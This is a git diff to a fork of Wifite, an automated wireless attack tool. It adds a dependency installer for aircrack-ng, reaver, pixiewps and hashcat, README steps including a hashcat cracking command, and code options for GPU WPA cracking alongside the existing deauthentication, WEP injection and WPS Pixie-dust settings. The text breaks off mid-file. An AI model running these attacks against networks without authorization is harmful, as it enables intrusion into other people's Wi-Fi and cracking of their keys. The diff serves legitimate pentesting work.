diff --git a/deps.sh b/deps.sh new file mode 100755 index 0000000..68026e4 --- /dev/null +++ b/deps.sh @@ -0,0 +1,153 @@ +#!/bin/bash + +# @author : Eduardo Novella +# 2015-11-13 + + +# TODO +# pyrit has not been tested + +APTCMD="apt-get" +APT_CANDIDATES="wget tshark gzip bzip2 tar p7zip p7zip-full" +DEPS_PYRIT="python2.7-dev python2.7-libpcap subversion libpcap-dev nvidia-cuda-toolkit \ + linux-headers-$(uname -r) python-dev libssl-dev libpcap-dev zlib1g-dev cmake libboost1.54" +DEPS_AIRCRACK="build-essential libssl-dev pkg-config subversion libsqlite3-dev libpcap-dev sqlite3 libsqlite3-dev make gcc" +DEPS_REAVER_PIXIE="git libssl-dev" + +VIOLET="\e[01;35m" +BLUE="\e[01;34m" +YELLOW="\e[01;33m" +RED="\e[01;31m" +GREEN="\e[01;32m" +END="\e[00m" + + +# Check for root privileges +if [ $UID -eq 0 ] +then + SUDO="" +else + SUDO="sudo" +fi + + +# Check if number of arguments introduced is one +if [ "$#" -ne 1 ] +then + echo -e "\nUsage: bash $0 AMD" + echo -e " bash $0 CUDA\n" + echo -e "AMD is your hashcat choice for AMD GPUs" + echo -e "CUDA is your hashcat choice for CUDA GPUs\n" + exit +fi + +# Functions to install programs +function install_hashcat() +{ + + cd ~ + if [ "AMD" == "$1" ]; then + prefix="ocl" + elif [ "CUDA" == "$1" ]; then + prefix="cuda" + else + exit + fi + + wget https://hashcat.net/files/${prefix}Hashcat-1.37.7z + 7z x ${prefix}Hashcat-1.37.7z + echo -e "\n[+] Your $RED HASHCAT_PATH $END to add in wifite.py is $GREEN $PWD/${prefix}Hashcat-1.37 $END\n" + rm ${prefix}Hashcat-1.37.7z 2>/dev/null + +} + + +function install_cowpatty +{ + cd /tmp + wget http://www.willhackforsushi.com/code/cowpatty/4.6/cowpatty-4.6.tgz + tar zxfv /tmp/cowpatty-4.6.tgz + cd /tmp/cowpatty-4.6 + $SUDO make clean 2>/dev/null + make -j + $SUDO make install + rm -rf /tmp/cowpatty* +} + + + +# function install_pyrit +# { +# $SUDO $APTCMD install $DEPS_PYRIT -y + +# if [ "AMD" == "$1" ]; then +# prefix="opencl" +# elif [ "CUDA" == "$1" ]; then +# prefix="cuda" +# else +# exit +# fi + +# cd /tmp +# wget https://pyrit.googlecode.com/files/cpyrit-${prefix}-0.4.0.tar.gz +# tar xvzf cpyrit-${prefix}-0.4.0.tar.gz +# cd cpyrit-${prefix}-0.4.0/ +# $SUDO python setup.py install + +# $SUDO rm -rf cpyrit* +# } + +function install_pyrit +{ + $SUDO $APTCMD install pyrit -y +} + +function install_aircrack-ng-svn +{ + $SUDO $APTCMD install $DEPS_AIRCRACK -y + + cd /tmp + svn co http://svn.aircrack-ng.org/trunk/ aircrack-ng + cd aircrack-ng + make pcre=true sqlite=true -j2 + $SUDO make pcre=true sqlite=true install + $SUDO airodump-ng-oui-update & + + rm -rf /tmp/aircrack* +} + + +function install_reaver-pixie +{ + $SUDO $APTCMD install $DEPS_REAVER_PIXIE -y + + cd /tmp + git clone https://github.com/wiire/pixiewps.git + cd pixiewps/src + make -j + $SUDO make install + + cd /tmp + git clone https://github.com/t6x/reaver-wps-fork-t6x + cd reaver-wps-fork-t6x/src + ./configure + make -j2 + $SUDO make install + + rm -rf /tmp/pixiewps /tmp/reaver-wps-fork-t6x +} + + + + +# MAIN +$SUDO $APTCMD update +$SUDO $APTCMD install $APT_CANDIDATES -y + +install_cowpatty +install_pyrit +install_aircrack-ng-svn +install_reaver-pixie +install_hashcat $1 + + diff --git a/readme.md b/readme.md index 00b39a5..79e6751 100644 --- a/readme.md +++ b/readme.md @@ -7,7 +7,9 @@ An automated wireless attack tool. What's New? ----------- -The biggest change from version 1 is support for ["reaver"](http://reaver-wps.googlecode.com/), a Wifi-Protected Setup (WPS) attack tool. Reaver can compromise the PIN and PSK for many routers that have WPS enabled, usually within hours. +The biggest change from version 1 is support for the tool [reaver](http://reaver-wps.googlecode.com/), a Wifi-Protected Setup (WPS) attack tool. Reaver can compromise the PIN and PSK for many routers that have WPS enabled, usually within hours. The tool pixiewps is also included and the script is up-to-date supporting the Pixie dust attack. + +Another big change is the support for [hashcat](https://hashcat.net). Now Wifite can perform WPA cracking with multiGPUs at the same time. Other changes include a complete code re-write with bug fixes and added stability. Due to problems with the Python Tkinter suite, the GUI has been left out of this latest version. @@ -15,23 +17,35 @@ Other changes include a complete code re-write with bug fixes and added stabilit About ----- -_Wifite is for Linux only._ +_Wifite is only for Linux._ -Wifite was designed for use with pentesting distributions of Linux, such as [Kali Linux](http://www.kali.org/), [Pentoo](http://www.pentoo.ch/), [BackBox](http://www.backbox.org); any Linux distributions with wireless drivers patched for injection. The script appears to also operate with Ubuntu 11/10, Debian 6, and Fedora 16. +Wifite was designed for use with pentesting distributions of Linux, such as [Kali Linux](http://www.kali.org/), [Pentoo](http://www.pentoo.ch/), [BackBox](http://www.backbox.org); any Linux distributions with wireless drivers patched for injection. The script appears to also operate with Ubuntu 14.04/15.04, Debian 8 and Fedora 16. Wifite must be run as __root__. This is required by the suite of programs it uses. Running downloaded scripts as root is a bad idea. I recommend using the Kali Linux bootable Live CD, a bootable USB stick (for persistent), or a virtual machine. Note that Virtual Machines cannot directly access hardware so a wireless USB dongle would be required. Wifite assumes that you have a wireless card and the appropriate drivers that are patched for injection and promiscuous/monitor mode. + +Dependencies +------------ + +In order to install all the prerequisites execute the following script. This script is for debian-based Linux distributions. + +```{r, engine='bash'} +bash deps.sh +bash deps.sh [CUDA or AMD] +``` Execution --------- To download and execute wifite, run the commands below: -`wget https://raw.github.com/derv82/wifite/master/wifite.py` -`chmod +x wifite.py` -`./wifite.py` +```sh +git clone https://github.com/enovella/wifite.git +chmod +x wifite.py +sudo python wifite.py +``` Required Programs @@ -55,11 +69,14 @@ Please see [the installation guide](https://github.com/derv82/wifite/wiki/Instal Suggested Programs ------------------ -_`*` indicates program is not included in [Backtrack 5 R1](http://www.backtrack-linux.org/)_ +* [__reaver__](http://code.google.com/p/reaver-wps/), a Wifi-Protected Setup (WPS) attack tool. Reaver includes a scanner "walsh" (or "wash") for detecting WPS-enabled access points. Wifite uses Reaver to scan for and attack WPS-enabled routers. -* `*`[__reaver__](http://code.google.com/p/reaver-wps/), a Wifi-Protected Setup (WPS) attack tool. Reaver includes a scanner "walsh" (or "wash") for detecting WPS-enabled access points. Wifite uses Reaver to scan for and attack WPS-enabled routers. +* [__hashcat__](https://hashcat.net), the best and fastest WPA PSK key MultiGPU cracker. Worlds fastest password cracker. It can be run as follows: +``` +python wifite.py --aircrack --hashcat-gpu --dic /wordlists/rockyou.txt +``` -* `*`[__pyrit__](http://code.google.com/p/pyrit/), a GPU cracker for WPA PSK keys. Wifite uses pyrit (if found) to detect handshakes. In the future, Wifite may include an option to crack WPA handshakes via pyrit. +* [__pyrit__](http://code.google.com/p/pyrit/), a GPU cracker for WPA PSK keys. Wifite uses pyrit (if found) to detect handshakes. In the future, Wifite may include an option to crack WPA handshakes via pyrit. * __tshark__. Comes bundled with [Wireshark](http://www.wireshark.org/), packet sniffing software. @@ -71,4 +88,16 @@ Licensing Wifite is licensed under the GNU General Public License version 2 (GNU GPL v2). +``` (C) 2010-2012 Derv Merkler +``` + +``` + +(C) 2014-2015 ballastsec@gmail.com --> bwall @botnet_hunter && drone @dronesec + g0tmi1k && invisibleroads && intech && hatRiot +``` + +``` +(C) 2015-2016 Eduardo Novella (@enovella_) +``` \ No newline at end of file diff --git a/wifite.py b/wifite.py index 3fb72e8..c41c6a3 100755 --- a/wifite.py +++ b/wifite.py @@ -1,13 +1,13 @@ #!/usr/bin/python - # -*- coding: utf-8 -*- """ wifite author: derv82 at gmail - author: bwall @botnet_hunter (ballastsec@gmail.com) - author: drone @dronesec (ballastsec@gmail.com) + author: bwall @botnet_hunter (ballastsec@gmail.com) + author: drone @dronesec (ballastsec@gmail.com) + author: Eduardo Novella @enovella_ (ednolo@inf.upv.es) Thanks to everyone that contributed to this project. If you helped in the past and want your name here, shoot me an email @@ -69,16 +69,17 @@ """ -# ############ +############# # LIBRARIES # ############# -import csv # Exporting and importing cracked aps -import os # File management -import time # Measuring attack intervals +import csv # Exporting and importing cracked aps +import os # File management +import time # Measuring attack intervals import random # Generating a random MAC address. -import errno # Error numbers +import errno # Error numbers +# TODO remove argv? from sys import argv # Command-line arguments from sys import stdout # Flushing @@ -99,20 +100,23 @@ ################################ # Console colors -W = '\033[0m' # white (normal) -R = '\033[31m' # red -G = '\033[32m' # green -O = '\033[33m' # orange -B = '\033[34m' # blue -P = '\033[35m' # purple -C = '\033[36m' # cyan +W = '\033[0m' # white (normal) +R = '\033[31m' # red +G = '\033[32m' # green +O = '\033[33m' # orange +B = '\033[34m' # blue +P = '\033[35m' # purple +C = '\033[36m' # cyan GR = '\033[37m' # gray # /dev/null, send output from programs so they don't print to screen. -DN = open(os.devnull, 'w') +DN = open(os.devnull, 'w') ERRLOG = open(os.devnull, 'w') OUTLOG = open(os.devnull, 'w') +# Hashcat support +HASHCAT_PATH = '/media/dudu/t3r4/GPUcracking/oclHashcat-1.37' # CHANGE_ME + ################### # DATA STRUCTURES # ################### @@ -122,125 +126,127 @@ class CapFile: """ Holds data about an access point's .cap file, including AP's ESSID & BSSID. """ - def __init__(self, filename, ssid, bssid): self.filename = filename - self.ssid = ssid - self.bssid = bssid + self.ssid = ssid + self.bssid = bssid class Target: """ Holds data for a Target (aka Access Point aka Router) """ - def __init__(self, bssid, power, data, channel, encryption, ssid): - self.bssid = bssid - self.power = power - self.data = data - self.channel = channel + self.bssid = bssid + self.power = power + self.data = data + self.channel = channel self.encryption = encryption - self.ssid = ssid - self.wps = False # Default to non-WPS-enabled router. - self.key = '' + self.ssid = ssid + self.wps = False # Default to non-WPS-enabled router. + self.key = '' class Client: """ Holds data for a Client (device connected to Access Point/Router) """ - def __init__(self, bssid, station, power): - self.bssid = bssid + self.bssid = bssid self.station = station - self.power = power + self.power = power class RunConfiguration: """ Configuration for this rounds of attacks """ - def __init__(self): - self.REVISION = 87; - self.PRINTED_SCANNING = False + self.REVISION = 87 + self.PRINTED_SCANNING = False - self.TX_POWER = 0 # Transmit power for wireless interface, 0 uses default power + self.TX_POWER = 0 # Transmit power for wireless interface, 0 uses default power # WPA variables - self.WPA_DISABLE = False # Flag to skip WPA handshake capture + self.WPA_DISABLE = False # Flag to skip WPA handshake capture self.WPA_STRIP_HANDSHAKE = True # Use pyrit or tshark (if applicable) to strip handshake - self.WPA_DEAUTH_COUNT = 5 # Count to send deauthentication packets - self.WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds) - self.WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds) - self.WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored + self.WPA_DEAUTH_COUNT = 5 # Count to send deauthentication packets + self.WPA_DEAUTH_TIMEOUT = 10 # Time to wait between deauthentication bursts (in seconds) + self.WPA_ATTACK_TIMEOUT = 500 # Total time to allow for a handshake attack (in seconds) + self.WPA_HANDSHAKE_DIR = 'hs' # Directory in which handshakes .cap files are stored # Strip file path separator if needed if self.WPA_HANDSHAKE_DIR != '' and self.WPA_HANDSHAKE_DIR[-1] == os.sep: self.WPA_HANDSHAKE_DIR = self.WPA_HANDSHAKE_DIR[:-1] - self.WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks + self.WPA_FINDINGS = [] # List of strings containing info on successful WPA attacks self.WPA_DONT_CRACK = False # Flag to skip cracking of handshakes + + # Kali & BackTrack distros if os.path.exists('/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'): self.WPA_DICTIONARY = '/usr/share/wfuzz/wordlist/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt' elif os.path.exists('/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt'): self.WPA_DICTIONARY = '/usr/share/fuzzdb/wordlists-user-passwd/passwds/phpbb.txt' + # Wifislax 4 + elif os.path.exists('/root/Diccionarios-WPA/TODO'): + self.WPA_DICTIONARY = '/root/Diccionarios-WPA/TODO' else: self.WPA_DICTIONARY = '' # Various programs to use when checking for a four-way handshake. # True means the program must find a valid handshake in order for wifite to recognize a handshake. # Not finding handshake short circuits result (ALL 'True' programs must find handshake) - self.WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th) - self.WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate. + self.WPA_HANDSHAKE_TSHARK = True # Checks for sequential 1,2,3 EAPOL msg packets (ignores 4th) + self.WPA_HANDSHAKE_PYRIT = False # Sometimes crashes on incomplete dumps, but accurate. + self.WPA_HANDSHAKE_HASHCAT = False self.WPA_HANDSHAKE_AIRCRACK = True # Not 100% accurate, but fast. self.WPA_HANDSHAKE_COWPATTY = False # Uses more lenient "nonstrict mode" (-2) # WEP variables - self.WEP_DISABLE = False # Flag for ignoring WEP networks - self.WEP_PPS = 600 # packets per second (Tx rate) - self.WEP_TIMEOUT = 600 # Amount of time to give each attack - self.WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng - self.WEP_CHOPCHOP = True # - self.WEP_FRAGMENT = True # - self.WEP_CAFFELATTE = True # - self.WEP_P0841 = True - self.WEP_HIRTE = True - self.WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking + self.WEP_DISABLE = False # Flag for ignoring WEP networks + self.WEP_PPS = 600 # packets per second (Tx rate) + self.WEP_TIMEOUT = 600 # Amount of time to give each attack + self.WEP_ARP_REPLAY = True # Various WEP-based attacks via aireplay-ng + self.WEP_CHOPCHOP = True # + self.WEP_FRAGMENT = True # + self.WEP_CAFFELATTE = True # + self.WEP_P0841 = True + self.WEP_HIRTE = True + self.WEP_CRACK_AT_IVS = 10000 # Number of IVS at which we start cracking self.WEP_IGNORE_FAKEAUTH = True # When True, continues attack despite fake authentication failure - self.WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks. - self.WEP_SAVE = False # Save packets. + self.WEP_FINDINGS = [] # List of strings containing info on successful WEP attacks. + self.WEP_SAVE = False # Save packets. # WPS variables - self.WPS_DISABLE = False # Flag to skip WPS scan and attacks - self.PIXIE = False - self.WPS_FINDINGS = [] # List of (successful) results of WPS attacks - self.WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt + self.WPS_DISABLE = False # Flag to skip WPS scan and attacks + self.PIXIE = False + self.WPS_FINDINGS = [] # List of (successful) results of WPS attacks + self.WPS_TIMEOUT = 660 # Time to wait (in seconds) for successful PIN attempt self.WPS_RATIO_THRESHOLD = 0.01 # Lowest percentage of tries/attempts allowed (where tries > 0) - self.WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely. + self.WPS_MAX_RETRIES = 0 # Number of times to re-try the same pin before giving up completely. # Program variables self.SHOW_ALREADY_CRACKED = False # Says whether to show already cracked APs as options to crack - self.WIRELESS_IFACE = '' # User-defined interface - self.MONITOR_IFACE = '' # User-defined interface already in monitor mode - self.TARGET_CHANNEL = 0 # User-defined channel to scan on - self.TARGET_ESSID = '' # User-defined ESSID of specific target to attack - self.TARGET_BSSID = '' # User-defined BSSID of specific target to attack - self.IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode + self.WIRELESS_IFACE = '' # User-defined interface + self.MONITOR_IFACE = '' # User-defined interface already in monitor mode + self.TARGET_CHANNEL = 0 # User-defined channel to scan on + self.TARGET_ESSID = '' # User-defined ESSID of specific target to attack + self.TARGET_BSSID = '' # User-defined BSSID of specific target to attack + self.IFACE_TO_TAKE_DOWN = '' # Interface that wifite puts into monitor mode # It's our job to put it out of monitor mode after the attacks - self.ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing) - self.DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer - self.SEND_DEAUTHS = True # Flag for deauthing clients while scanning for acces points - self.TARGETS_REMAINING = 0 # Number of access points remaining to attack - self.WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects) - self.THIS_MAC = '' # The interfaces current MAC address. - self.SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets - self.CRACKED_TARGETS = [] # List of targets we have already cracked - self.ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone* - self.ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target - self.VERBOSE_APS = True # Print access points as they appear - self.CRACKED_TARGETS = self.load_cracked() - old_cracked = self.load_old_cracked() + self.ORIGINAL_IFACE_MAC = ('', '') # Original interface name[0] and MAC address[1] (before spoofing) + self.DO_NOT_CHANGE_MAC = True # Flag for disabling MAC anonymizer + self.SEND_DEAUTHS = True # Flag for deauthing clients while scanning for acces points + self.TARGETS_REMAINING = 0 # Number of access points remaining to attack + self.WPA_CAPS_TO_CRACK = [] # list of .cap files to crack (full of CapFile objects) + self.THIS_MAC = '' # The interfaces current MAC address. + self.SHOW_MAC_IN_SCAN = False # Display MACs of the SSIDs in the list of targets + self.CRACKED_TARGETS = [] # List of targets we have already cracked + self.ATTACK_ALL_TARGETS = False # Flag for when we want to attack *everyone* + self.ATTACK_MIN_POWER = 0 # Minimum power (dB) for access point to be considered a target + self.VERBOSE_APS = True # Print access points as they appear + self.CRACKED_TARGETS = self.load_cracked() + old_cracked = self.load_old_cracked() if len(old_cracked) > 0: # Merge the results for OC in old_cracked: @@ -291,7 +297,7 @@ def load_cracked(self): with open('cracked.csv', 'rb') as csvfile: targetreader = csv.reader(csvfile, delimiter=',', quotechar='"') for row in targetreader: - t = Target(row[0], 0, 0, 0, row[1], row[2]) + t = Target(row[0], 0, 0, 0, row[1], row[2]) t.key = row[3] t.wps = row[4] result.append(t) @@ -304,7 +310,7 @@ def load_old_cracked(self): result = [] if not os.path.exists('cracked.txt'): return result - fin = open('cracked.txt', 'r') + fin = open('cracked.txt', 'r') lines = fin.read().split('\n') fin.close() @@ -343,11 +349,11 @@ def handle_args(self): """ set_encrypt = False set_hscheck = False - set_wep = False - capfile = '' # Filename of .cap file to analyze for handshakes - - opt_parser = self.build_opt_parser() - options = opt_parser.parse_args() + set_wep = False + capfile = '' # Filename of .cap file to analyze for handshakes + + opt_parser = self.build_opt_parser() + options = opt_parser.parse_args() try: if not set_encrypt and (options.wpa or options.wep or options.wps): @@ -375,7 +381,7 @@ def handle_args(self): print GR + ' [+]' + W + ' using only ' + G + 'WPS Pixie-Dust' + W + ' attack.' self.WPS_DISABLE = False self.WEP_DISABLE = True - self.PIXIE = True + self.PIXIE = True if options.channel: try: self.TARGET_CHANNEL = int(options.channel) @@ -469,11 +475,11 @@ def handle_args(self): self.exit_gracefully(0) # WPA if not set_hscheck and (options.tshark or options.cowpatty or options.aircrack or options.pyrit): - self.WPA_HANDSHAKE_TSHARK = False - self.WPA_HANDSHAKE_PYRIT = False + self.WPA_HANDSHAKE_TSHARK = False + self.WPA_HANDSHAKE_PYRIT = False self.WPA_HANDSHAKE_COWPATTY = False self.WPA_HANDSHAKE_AIRCRACK = False - set_hscheck = True + set_hscheck = True if options.strip: self.WPA_STRIP_HANDSHAKE = True print GR + ' [+]' + W + ' handshake stripping ' + G + 'enabled' + W @@ -516,7 +522,7 @@ def handle_args(self): print GR + ' [+]' + W + ' tshark handshake verification ' + G + 'enabled' + W if options.pyrit: self.WPA_HANDSHAKE_PYRIT = True - print GR + ' [+]' + W + ' pyrit handshake verification ' + G + 'enabled' + W + print GR + ' [+]' + W + ' pyrit handshake verification ' + G + 'enabled' + W if options.aircrack: self.WPA_HANDSHAKE_AIRCRACK = True print GR + ' [+]' + W + ' aircrack handshake verification ' + G + 'enabled' + W @@ -527,12 +533,12 @@ def handle_args(self): # WEP if not set_wep and options.chopchop or options.fragment or options.caffeelatte or options.arpreplay \ or options.p0841 or options.hirte: - self.WEP_CHOPCHOP = False - self.WEP_ARPREPLAY = False + self.WEP_CHOPCHOP = False + self.WEP_ARPREPLAY = False self.WEP_CAFFELATTE = False - self.WEP_FRAGMENT = False - self.WEP_P0841 = False - self.WEP_HIRTE = False + self.WEP_FRAGMENT = False + self.WEP_P0841 = False + self.WEP_HIRTE = False if options.chopchop: print GR + ' [+]' + W + ' WEP chop-chop attack ' + G + 'enabled' + W self.WEP_CHOPCHOP = True @@ -691,6 +697,16 @@ def build_opt_parser(self): wpa_group.add_argument('--crack', help='Crack WPA handshakes using [dic] wordlist file.', action='store_true', dest='crack') wpa_group.add_argument('-crack', help=argparse.SUPPRESS, action='store_true', dest='crack') + wpa_group.add_argument('--hashcat-gpu', help='Crack WPA handshakes using oclHashcat and wordlists.', default=False, action='store_true', + dest='hashcat-gpu') + wpa_group.add_argument('-hashcat-gpu', help=argparse.SUPPRESS, default=False, action='store_true', dest='hashcat-gpu') + wpa_group.add_argument('--hashcat-gpu-full', help='Crack WPA handshakes using oclHashcat and combined attacks such as \ + rules, masks and hybrids.', default=False, action='store_true', + dest='hashcat-gpu-full') + wpa_group.add_argument('-hashcat-gpu-full', help=argparse.SUPPRESS, default=False, action='store_true', dest='hashcat-gpu-full') + wpa_group.add_argument('--hashcat-test', help='Verify oclHashcat and graphic drivers.', default=False, action='store_true', + dest='hashcat-test') + wpa_group.add_argument('-hashcat-test', help=argparse.SUPPRESS, default=False, action='store_true', dest='hashcat-test') wpa_group.add_argument('--dict', help='Specificy dictionary to use when cracking WPA.', action='store', dest='dic') wpa_group.add_argument('-dict', help=argparse.SUPPRESS, action='store', dest='dic') @@ -699,7 +715,7 @@ def build_opt_parser(self): wpa_group.add_argument('-aircrack', help=argparse.SUPPRESS, default=False, action='store_true', dest='aircrack') wpa_group.add_argument('--pyrit', help='Verify handshake using pyrit.', default=False, action='store_true', dest='pyrit') - wpa_group.add_argument('-pyrit', help=argparse.SUPPRESS, default=False, action='store_true', dest='pyrit') + wpa_group.add_argument('-pyrit', help=argparse.SUPPRESS, default=False, action='store_true', dest='pyrit') wpa_group.add_argument('--tshark', help='Verify handshake using tshark.', default=False, action='store_true', dest='tshark') wpa_group.add_argument('-tshark', help=argparse.SUPPRESS, default=False, action='store_true', dest='tshark') @@ -832,11 +848,11 @@ def upgrade(self): except KeyboardInterrupt: print R + '\n (^C)' + O + ' wifite upgrade interrupted' + W self.exit_gracefully(0) - + class RunEngine: def __init__(self, run_config): - self.RUN_CONFIG = run_config + self.RUN_CONFIG = run_config self.RUN_CONFIG.RUN_ENGINE = self def initial_check(self): @@ -875,6 +891,7 @@ def initial_check(self): printed = True print R + ' [!]' + O + ' the program %s is not required, but is recommended%s' % (R + rec + O, W) if printed: print '' + def enable_monitor_mode(self, iface): """ @@ -917,7 +934,7 @@ def rtl8187_fix(self, iface): Returns True if fix was attempted, False otherwise. """ # Check if current interface is using the RTL8187 chipset - proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN) + proc_airmon = Popen(['airmon-ng'], stdout=PIPE, stderr=DN) proc_airmon.wait() using_rtl8187 = False for line in proc_airmon.communicate()[0].split(): @@ -1068,8 +1085,8 @@ def scan(self, channel=0, iface='', tried_rtl8187_fix=False): print GR + ' [+] ' + G + 'initializing scan' + W + ' (' + G + iface + W + '), updates at 5 sec intervals, ' + G + 'CTRL+C' + W + ' when ready.' (targets, clients) = ([], []) try: - deauth_sent = 0.0 - old_targets = [] + deauth_sent = 0.0 + old_targets = [] stop_scanning = False while True: time.sleep(0.3) @@ -1432,8 +1449,8 @@ def Start(self): wpa_success = 0 wep_success = 0 - wpa_total = 0 - wep_total = 0 + wpa_total = 0 + wep_total = 0 self.RUN_CONFIG.TARGETS_REMAINING = len(targets) for t in targets: @@ -1449,21 +1466,21 @@ def Start(self): if t.encryption.find('WPA') != -1: need_handshake = True if not self.RUN_CONFIG.WPS_DISABLE and t.wps: - wps_attack = WPSAttack(iface, t, self.RUN_CONFIG) + wps_attack = WPSAttack(iface, t, self.RUN_CONFIG) need_handshake = not wps_attack.RunAttack() - wpa_total += 1 + wpa_total += 1 if not need_handshake: wpa_success += 1 if self.RUN_CONFIG.TARGETS_REMAINING < 0: break if not self.RUN_CONFIG.PIXIE and not self.RUN_CONFIG.WPA_DISABLE and need_handshake: - wpa_total += 1 + wpa_total += 1 wpa_attack = WPAAttack(iface, t, ts_clients, self.RUN_CONFIG) if wpa_attack.RunAttack(): wpa_success += 1 elif t.encryption.find('WEP') != -1: - wep_total += 1 + wep_total += 1 wep_attack = WEPAttack(iface, t, ts_clients, self.RUN_CONFIG) if wep_attack.RunAttack(): wep_success += 1 @@ -1549,22 +1566,22 @@ def parse_csv(self, filename): wps = True if len(enc) > 4: enc = enc[4:].strip() - power = int(row[8].strip()) - - ssid = row[13].strip() + power = int(row[8].strip()) + + ssid = row[13].strip() ssidlen = int(row[12].strip()) - ssid = ssid[:ssidlen] + ssid = ssid[:ssidlen] if power < 0: power += 100 - t = Target(row[0].strip(), power, row[10].strip(), row[3].strip(), enc, ssid) + t = Target(row[0].strip(), power, row[10].strip(), row[3].strip(), enc, ssid) t.wps = wps targets.append(t) else: if len(row) < 6: continue - bssid = re.sub(r'[^a-zA-Z0-9:]', '', row[0].strip()) + bssid = re.sub(r'[^a-zA-Z0-9:]', '', row[0].strip()) station = re.sub(r'[^a-zA-Z0-9:]', '', row[5].strip()) - power = row[3].strip() + power = row[3].strip() if station != 'notassociated': c = Client(bssid, station, power) clients.append(c) @@ -1695,7 +1712,7 @@ def get_revision(): # get the revision start = page.find('REVISION = ') - stop = page.find(";", start) + stop = page.find(";", start) if start != -1 and stop != -1: start += 11 rev = page[start:stop] @@ -1708,72 +1725,72 @@ def get_revision(): return irev -def help(): - """ - Prints help screen - """ - - head = W - sw = G - var = GR - des = W - de = G - - print head + ' COMMANDS' + W - print sw + '\t-check ' + var + '\t' + des + 'check capfile ' + var + '' + des + ' for handshakes.' + W - print sw + '\t-cracked \t' + des + 'display previously-cracked access points' + W - print sw + '\t-recrack \t' + des + 'allow recracking of previously cracked access points' + W - print '' - - print head + ' GLOBAL' + W - print sw + '\t-all \t' + des + 'attack all targets. ' + de + '[off]' + W - #print sw+'\t-pillage \t'+des+'attack all targets in a looping fashion.'+de+'[off]'+W - print sw + '\t-i ' + var + ' \t' + des + 'wireless interface for capturing ' + de + '[auto]' + W - print sw + '\t-mon-iface ' + var + ' \t' + des + 'interface in monitor mode for capturing ' + de + '[auto]' + W - print sw + '\t-mac \t' + des + 'anonymize mac address ' + de + '[off]' + W - print sw + '\t-c ' + var + '\t' + des + 'channel to scan for targets ' + de + '[auto]' + W - print sw + '\t-e ' + var + ' \t' + des + 'target a specific access point by ssid (name) ' + de + '[ask]' + W - print sw + '\t-b ' + var + ' \t' + des + 'target a specific access point by bssid (mac) ' + de + '[auto]' + W - print sw + '\t-showb \t' + des + 'display target BSSIDs after scan ' + de + '[off]' + W - print sw + '\t-pow ' + var + ' \t' + des + 'attacks any targets with signal strenghth > ' + var + 'db ' + de + '[0]' + W - print sw + '\t-quiet \t' + des + 'do not print list of APs during scan ' + de + '[off]' + W - print '' - - print head + '\n WPA' + W - print sw + '\t-wpa \t' + des + 'only target WPA networks (works with -wps -wep) ' + de + '[off]' + W - print sw + '\t-wpat ' + var + ' \t' + des + 'time to wait for WPA attack to complete (seconds) ' + de + '[500]' + W - print sw + '\t-wpadt ' + var + ' \t' + des + 'time to wait between sending deauth packets (sec) ' + de + '[10]' + W - print sw + '\t-strip \t' + des + 'strip handshake using tshark or pyrit ' + de + '[off]' + W - print sw + '\t-crack ' + var + '\t' + des + 'crack WPA handshakes using ' + var + '' + des + ' wordlist file ' + de + '[off]' + W - print sw + '\t-dict ' + var + '\t' + des + 'specify dictionary to use when cracking WPA ' + de + '[phpbb.txt]' + W - print sw + '\t-aircrack \t' + des + 'verify handshake using aircrack ' + de + '[on]' + W - print sw + '\t-pyrit \t' + des + 'verify handshake using pyrit ' + de + '[off]' + W - print sw + '\t-tshark \t' + des + 'verify handshake using tshark ' + de + '[on]' + W - print sw + '\t-cowpatty \t' + des + 'verify handshake using cowpatty ' + de + '[off]' + W - - print head + '\n WEP' + W - print sw + '\t-wep \t' + des + 'only target WEP networks ' + de + '[off]' + W - print sw + '\t-pps ' + var + ' \t' + des + 'set the number of packets per second to inject ' + de + '[600]' + W - print sw + '\t-wept ' + var + ' \t' + des + 'sec to wait for each attack, 0 implies endless ' + de + '[600]' + W - print sw + '\t-chopchop \t' + des + 'use chopchop attack ' + de + '[on]' + W - print sw + '\t-arpreplay \t' + des + 'use arpreplay attack ' + de + '[on]' + W - print sw + '\t-fragment \t' + des + 'use fragmentation attack ' + de + '[on]' + W - print sw + '\t-caffelatte \t' + des + 'use caffe-latte attack ' + de + '[on]' + W - print sw + '\t-p0841 \t' + des + 'use -p0841 attack ' + de + '[on]' + W - print sw + '\t-hirte \t' + des + 'use hirte (cfrag) attack ' + de + '[on]' + W - print sw + '\t-nofakeauth \t' + des + 'stop attack if fake authentication fails ' + de + '[off]' + W - print sw + '\t-wepca ' + GR + ' \t' + des + 'start cracking when number of ivs surpass n ' + de + '[10000]' + W - print sw + '\t-wepsave \t' + des + 'save a copy of .cap files to this directory ' + de + '[off]' + W - - print head + '\n WPS' + W - print sw + '\t-wps \t' + des + 'only target WPS networks ' + de + '[off]' + W - print sw + '\t-wpst ' + var + ' \t' + des + 'max wait for new retry before giving up (0: never) ' + de + '[660]' + W - print sw + '\t-wpsratio ' + var + '\t' + des + 'min ratio of successful PIN attempts/total tries ' + de + '[0]' + W - print sw + '\t-wpsretry ' + var + '\t' + des + 'max number of retries for same PIN before giving up ' + de + '[0]' + W - - print head + '\n EXAMPLE' + W - print sw + '\t./wifite.py ' + W + '-wps -wep -c 6 -pps 